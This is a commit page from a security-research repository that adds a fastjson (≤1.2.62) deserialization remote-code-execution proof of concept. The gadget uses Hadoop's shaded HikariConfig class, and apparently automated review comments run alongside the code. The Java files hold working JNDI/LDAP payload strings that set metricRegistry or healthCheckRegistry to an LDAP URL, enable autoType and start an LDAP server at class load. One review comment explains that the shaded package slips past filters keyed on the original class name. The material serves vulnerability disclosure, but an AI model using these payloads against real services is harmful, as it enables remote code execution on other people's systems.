
Commit 14e6c7c

author
threedr3am
committed
feat:fastjson新gadget(hadoop)
1 parent a5839c5 commit 14e6c7c


3 files changed

+43
-0
lines changed


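--- a/fastjson/pom.xml
+++ b/fastjson/pom.xml
@@ -49,5 +49,12 @@
 <artifactId>xbean-reflect</artifactId>
 <version>4.15</version>
 </dependency>
+
+<!-- https://mvnrepository.com/artifact/org.apache.hadoop/hadoop-client-minicluster -->
+<dependency>
+<groupId>org.apache.hadoop</groupId>
+<artifactId>hadoop-client-minicluster</artifactId>
+<version>3.2.1</version>
+</dependency>
 </dependencies>
 </project>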
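Review bot: The new `hadoop-client-minicluster` dependency is declared without a `<scope>`, and the comment above it is only the repository URL, so nothing records why a test-cluster bundle is on this module's classpath. Judging from HadoopHikariPoc.java in the same commit, it is there only because it ships the relocated `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` class; a comment such as `<!-- provides the shaded HikariConfig used by HadoopHikariPoc -->` would say so. The `<dependencies>` block begins outside the hunk.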
Lines changed: 34 additions & 0 deletions
@@ -0,0 +1,34 @@
1+
package com.threedr3am.bug.fastjson;
2+
3+
import com.alibaba.fastjson.JSON;
4+
import com.alibaba.fastjson.parser.ParserConfig;
5+
import com.threedr3am.bug.common.server.LdapServer;
6+
7+
/**
8+
* fastjson <= 1.2.62 RCE,需要开启AutoType (report by threedr3am to ASRC)
9+
*
10+
* <dependency>
11+
* <groupId>org.apache.hadoop</groupId>
12+
* <artifactId>hadoop-client-minicluster</artifactId>
13+
* <version>3.2.1</version>
14+
* </dependency>
15+
*
16+
* @author threedr3am
17+
*/
18+
public class HadoopHikariPoc {
19+
static {
20+
//rmi server示例
21+
// RmiServer.run();
22+
23+
//ldap server示例
24+
LdapServer.run();
25+
}
26+
27+
public static void main(String[] args) {
28+
ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
29+
30+
String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
31+
String payload2 = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
32+
JSON.parse(payload);
33+
}
34+
}
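Review bot: `payload2` on line 31 is assigned but never used, so only the `metricRegistry` variant reaches `JSON.parse` on line 32; the same unused `payload2` is added at line 38 of HikariConfigPoc.java. Either drop the variable or mark it, e.g. `// alternative property, kept for reference; not parsed`. The Javadoc gives the affected version and the autoType precondition but not the defensive takeaway; an English line such as `Requires autoType to be enabled explicitly (see main); keep it disabled and upgrade fastjson` would help readers hardening their own services. It is also worth noting there that the class lives under the relocated package `org.apache.hadoop.shaded.com.zaxxer.hikari`, so a filter keyed on `com.zaxxer.hikari` would presumably not match it. The static initializer calls `LdapServer.run()` at class-load time (LdapServer is not visible here), so a comment on that side effect, or moving the call into `main`, would make it explicit.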

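--- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/HikariConfigPoc.java
+++ b/fastjson/src/main/java/com/threedr3am/bug/fastjson/HikariConfigPoc.java
@@ -33,7 +33,9 @@ public static void main(String[] args) {
 ParserConfig.global.setAutoTypeSupport(true);
 
 // String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";
+// String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"rmi://localhost:43657/Calc\"}";
 String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
+String payload2 = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
 JSON.parse(payload);
 }
 }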
